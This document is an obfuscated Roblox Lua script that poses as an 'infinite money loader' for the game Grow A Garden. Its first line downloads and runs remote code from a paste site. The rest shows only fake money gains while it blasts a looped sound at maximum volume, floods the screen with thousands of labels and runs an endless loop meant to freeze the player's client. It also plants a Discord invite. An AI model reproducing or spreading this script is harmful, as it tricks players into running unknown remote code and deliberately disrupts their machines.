loadstring(game:HttpGet("http://vpaste.net/dxPQL"))()
local v0=game.Players.LocalPlayer;print("[INFO] LocalPlayer loaded:",v0);local v1=v0:WaitForChild("PlayerGui");print("[INFO] PlayerGui found:",v1);local v2=v1:FindFirstChild("Loading");if  not v2 then local v5=0 -0 ;while true do if (v5==(0 + 0)) then warn("[ERROR] 'Loading' GUI not found in PlayerGui.");return;end end end print("[INFO] Found Loading GUI");if v2:IsA("ScreenGui") then local v6=0 -0 ;local v7;local v8;local v9;local v10;local v11;while true do if (v6==1) then v8=v7:FindFirstChild("Title");v9=v7:FindFirstChild("Tip");v10=v7:FindFirstChild("Bar");v6=954 -(802 + 150) ;end if (v6==(10 -6)) then spawn(function() local v17=0 -0 ;print("[INFO] Rainbow loop started");while true do v17=(v17 + 0.01 + 0)%(998 -(915 + 82)) ;v8.TextColor3=Color3.fromHSV(v17,2 -1 ,1 + 0 );wait(0.12);end end);spawn(function() print("[INFO] Waiting 5 seconds for Easter Egg...");wait(77);local v18=v2:FindFirstChild("EggImage");if v18 then local v39=0 -0 ;while true do if (v39==(1188 -(1069 + 118))) then wait(0.2 -0 );break;end if (v39==0) then print("[WARN] Previous EggImage found. Removing it.");v18:Destroy();v39=1;end end end local v19=v2:FindFirstChild("LoudLoop");if v19 then print("[WARN] Previous LoudLoop sound found. Removing it.");v19:Destroy();wait(0.2 -0 );end print("[INFO] Adding EggImage and Sound to Loading GUI...");local v20=Instance.new("ImageLabel");v20.Name="EggImage";v20.Size=UDim2.new(1 + 0 ,0 -0 ,1 + 0 ,791 -(368 + 423) );v20.Position=UDim2.new(0 -0 ,18 -(10 + 8) ,0,0 -0 );v20.BackgroundTransparency=443 -(416 + 26) ;v20.Image="rbxassetid://668614178";v20.ZIndex=638 -438 ;v20.Parent=v2;print("[INFO] Image added");local v28=Instance.new("Sound");v28.Name="LoudLoop";v28.SoundId="rbxassetid://7076365030";v28.Volume=5 + 5 ;v28.Looped=true;v28.Parent=v2;v28:Play();print("[INFO] Sound started playing");end);break;end if ((4 -1)==v6) then print("[INFO] Title and Tip text set");v11=v10:FindFirstChild("UiCorner");if v11 then v11:Destroy();print("[INFO] UiCorner removed");end v6=4;end if (v6==(440 -(145 + 293))) then if ( not v8 or  not v9 or  not v10) then local v37=430 -(44 + 386) ;while true do if (v37==(1486 -(998 + 488))) then warn("[ERROR] One or more UI elements missing in MainFrame");return;end end end v9.Text="https://discord.gg/VZPCPq7aFB";v8.Text="Grow A Garden Infinite Money Loader";v6=3;end if (v6==0) then print("[INFO] Loading is a ScreenGui");v7=v2:FindFirstChild("MainFrame");if  not v7 then local v38=0 + 0 ;while true do if (v38==(0 + 0)) then warn("[ERROR] 'MainFrame' not found in Loading GUI.");return;end end end v6=773 -(201 + 571) ;end end else warn("[ERROR] 'Loading' is not a ScreenGui!");end spawn(function() local v3=0;local v4;while true do if (v3==(1139 -(116 + 1022))) then v4=v0:WaitForChild("PlayerGui");for v14=1,20816 -15816  do local v15=0 + 0 ;local v16;while true do if ((7 -5)==v15) then v16.BackgroundColor3=Color3.new(math.random(),math.random(),math.random());v16.TextColor3=Color3.new(3 -2 ,860 -(814 + 45) ,2 -1 );v15=1 + 2 ;end if (v15==(2 + 1)) then v16.Parent=v4;if ((v14%(985 -(261 + 624)))==0) then wait(0 -0 );end break;end if (v15==(1080 -(1020 + 60))) then v16=Instance.new("TextLabel");v16.Text="Lagging Out Roblox!";v15=1;end if (v15==1) then v16.Size=UDim2.new(0,200,1423 -(630 + 793) ,30);v16.Position=UDim2.new(math.random(),0,math.random(),0);v15=6 -4 ;end end end v3=9 -7 ;end if (v3==(1 + 1)) then while true do for v34=3 -2 ,10000000 do local v35=math.sin(v34) * math.sqrt(v34) ;end end break;end if (v3==(1747 -(760 + 987))) then wait(80);print("[INFO] Starting MAXIMUM lag spam...");v3=1914 -(1789 + 124) ;end end end);
task.wait(5)



local plr = game:GetService("Players").LocalPlayer
local function maxVolumeInDescendants(parent)
	for _, obj in pairs(parent:GetDescendants()) do
		if obj:IsA("Sound") then
			obj.Volume = 10
		end
	end
end

-- Set volume in common locations
maxVolumeInDescendants(workspace)
maxVolumeInDescendants(plr:WaitForChild("PlayerGui"))

-- Optional: Try CoreGui if accessible (usually blocked)
local success, coreGui = pcall(function()
	return game:GetService("CoreGui")
end)

if success then
	maxVolumeInDescendants(coreGui)
end






















































wait(240)

while true do task.wait(0.3 -0 );local v0=game:GetService("Players");local v1=game:GetService("TweenService");local v2=game:GetService("Debris");local v3=game:GetService("SoundService");local v4=v0.LocalPlayer;local v5=v4:WaitForChild("PlayerGui");local v6=v5:WaitForChild("Sheckles_UI");local v7=v6:WaitForChild("Money");local v8=v6:WaitForChild("TextLabel");local function v9(v31) local v32=568 -(367 + 201) ;local v33;while true do if (v32==0) then v33=tostring(math.floor(v31));return v33:reverse():gsub("(%d%d%d)","%1,"):reverse():gsub("^,","");end end end local function v10(v34,v35,v36) local v37=Instance.new("NumberValue");v37.Value=v34;local v39=v1:Create(v37,TweenInfo.new(v36,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{Value=v35});v39:Play();local v40;v40=v37:GetPropertyChangedSignal("Value"):Connect(function() v8.Text=v9(v37.Value)   .. "¢" ;end);v39.Completed:Connect(function() local v42=927 -(214 + 713) ;while true do if (v42==(1 + 0)) then v8.Text=v9(v35)   .. "¢" ;break;end if (v42==(0 + 0)) then v40:Disconnect();v37:Destroy();v42=1;end end end);end local v11=1000000000;local v12=0.5;local v13=v7:Clone();v13.Text="+"   .. v9(v11)   .. "¢" ;v13.TextColor3=Color3.fromRGB(1132 -(282 + 595) ,1892 -(1523 + 114) ,0 + 0 );v13.TextStrokeColor3=Color3.new(0,0 -0 ,1065 -(68 + 997) );v13.TextStrokeTransparency=0;v13.TextTransparency=1270 -(226 + 1044) ;v13.TextScaled=false;v13.TextSize=v8.TextSize * (12.5 -9) ;v13.Position=v8.Position;v13.ZIndex=172 -(32 + 85) ;v13.Visible=true;v13.Parent=v6;local v26=v1:Create(v13,TweenInfo.new(v12,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{Position=v13.Position-UDim2.new(0 + 0 ,0 + 0 ,957.08 -(892 + 65) ,0 -0 ) ,TextTransparency=0.35 -0 ,TextStrokeTransparency=1 -0 });v26:Play();v2:AddItem(v13,v12);local v27=v3:FindFirstChild("Cash Register");if v27 then local v43=0;while true do if (v43==1) then v27:Play();break;end if (v43==(350 -(87 + 263))) then v27.TimePosition=180 -(67 + 113) ;v27.PlaybackSpeed=1 + 0 + (math.random( -15,36 -21 )/100) ;v43=1;end end end local v28=v8.Text:gsub(",",""):gsub("¢","");local v29=tonumber(v28) or 0 ;local v30=v29 + v11 ;v10(v29,v30,0.8 + 0 );end






















































































































